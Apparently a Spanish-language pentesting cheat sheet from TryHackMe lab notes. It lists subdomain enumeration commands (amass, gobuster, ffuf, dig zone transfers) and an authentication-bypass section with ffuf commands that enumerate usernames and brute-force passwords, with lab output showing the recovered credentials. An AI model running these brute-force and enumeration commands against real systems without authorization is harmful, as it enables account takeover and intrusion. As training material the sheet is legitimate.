Sub dominios
Osint
Dns BruteForce
Copiar ❯ dnsrecon -t brt -d 10.10.10.10 OSINT - Sublist3r
Copiar ❯ ./sublist3r.py -d domain.com Virtual Host
Copiar ❯ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.domain.com" -u http://10.10.10.10 Fuzzing
Copiar ❯ gobuster dns -d domain.com -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -t 100
Copiar ❯ wfuzz -c -f sub-fighter,raw -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 2395 -u 'http://domain.com' -H "Host:FUZZ.domain.com" Altdns
Subdomain discovery through alterations and permutations
Uso:
Copiar ❯ ls -la
total 19580
drwxr-xr-x 2 b0ysie7e b0ysie7e 4096 oct 2 12:14 .
drwxr-xr-x 3 b0ysie7e b0ysie7e 4096 oct 2 10:01 ..
-rw-r--r-- 1 b0ysie7e b0ysie7e 20032864 oct 2 12:14 list_subdomain.txt
-rw-r--r-- 1 b0ysie7e b0ysie7e 67 oct 2 12:11 subdomain.txt
Copiar ❯ cat subdomain.txt
api.domain.com
delta.domain.com
yellow.domain.com
web55.domain.com
Copiar ❯ altdns -i subdomain.txt -o new_subdomain.txt -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r -s results_output.txt Amass
Brute force, Google, VirusTotal, alt names, ASN discovery
Buscar pasivamente subdominios de un dominio:
Copiar amass enum -passive -d domain_name Encuentre subdominios de un dominio y verifíquelos activamente intentando resolver los subdominios encontrados:
Copiar amass enum -active -d domain_name -p 80,443,8080 Realice una búsqueda de fuerza bruta de subdominios:
Copiar amass enum -brute -d domain_name Guarde los resultados en un archivo de texto:
Copiar amass enum -o output_file -d domain_name Guarde los resultados en una base de datos:
Copiar amass enum -o output_file -dir path/to/database_directory Dig
Zone transfer, DNS lookups & reverse lookups
Enumeración de subdominios
Copiar dig domain.com @10.10.10.10 Enumeración por transferencia de zona
Copiar dig domain.com @10.10.10.10 axfr Dnscan
Copiar git clone https://github.com/rbsec/dnscan.git
cd dnscan
pip install -r requirements.txt
python3 dnscan.py -d dev-%%.example.org Dnsrecon
DNS zone transfer, DNS cache snooping, TLD expansion, SRV enumeration, DNS records enumeration, brute-force, check for Wildcard resolution, subdomain scraping, PTR record lookup, check DNS server cached records, mDNS records enumeration…
Copiar python dnsrecon.py -n ns1.domain.com -d domain.com -D subdomains-top1mil-5000.txt -t brt Dnssearch
Enumeración de subdominios
Copiar dnssearch -domain domain.com
Copiar dnssearch -domain domain.com -cname Gobuster
Copiar gobuster dns -d domain.com -w /usr/share/wordlists/dirb/common.txt -i
Copiar gobuster vhost -u domain.com -w /usr/share/wordlists/dirb/common.txt
Copiar gobuster vhost -u domain.com -w /usr/share/wordlists/dirb/common.txt -v Google
Usage
Find subsomains: site:*.target.com
Find subdomains & exclude specific ones: site:*.target.com -site:www.target.com -site:help.target.com
Knock
AXFR, virustotal, brute-force
Copiar knockpy domain.com --silent
knockpy domain.com --silent json
knockpy domain.com --silent json-pretty
knockpy domain.com --silent csv Massdns
Subbrute
Subfinder
VirusTotal, PassiveTotal, SecurityTrails, Censys, Riddler, Shodan, Bruteforce
Bypass de la autenticación
Brute force Enumeration user
Copiar ❯ ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.10.10/customers/signup -mr "username already exists"
Copiar /'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.61.51/customers/signup
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/Names/names.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&email=x&password=x&cpassword=x
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Regexp: username already exists
________________________________________________
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 214ms]
* FUZZ: admin
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 197ms]
* FUZZ: robert
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 203ms]
* FUZZ: simon
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 199ms]
* FUZZ: steve
:: Progress: [10177/10177] :: Job [1/1] :: 210 req/sec :: Duration: [0:00:51] :: Errors: 0 ::
Brute Force Enumeration password
Copiar ❯ ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.61.51/customers/login -fc 200
Copiar
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.61.51/customers/login
:: Wordlist : W1: /home/b0ysie7e/seven/tryhackme/jrPenetrationTester/SubdomainEnumeration/autheticationBypass/valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 200
________________________________________________
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 322ms]
* W1: steve
* W2: thunder Referencias:
Última actualización hace 7 meses
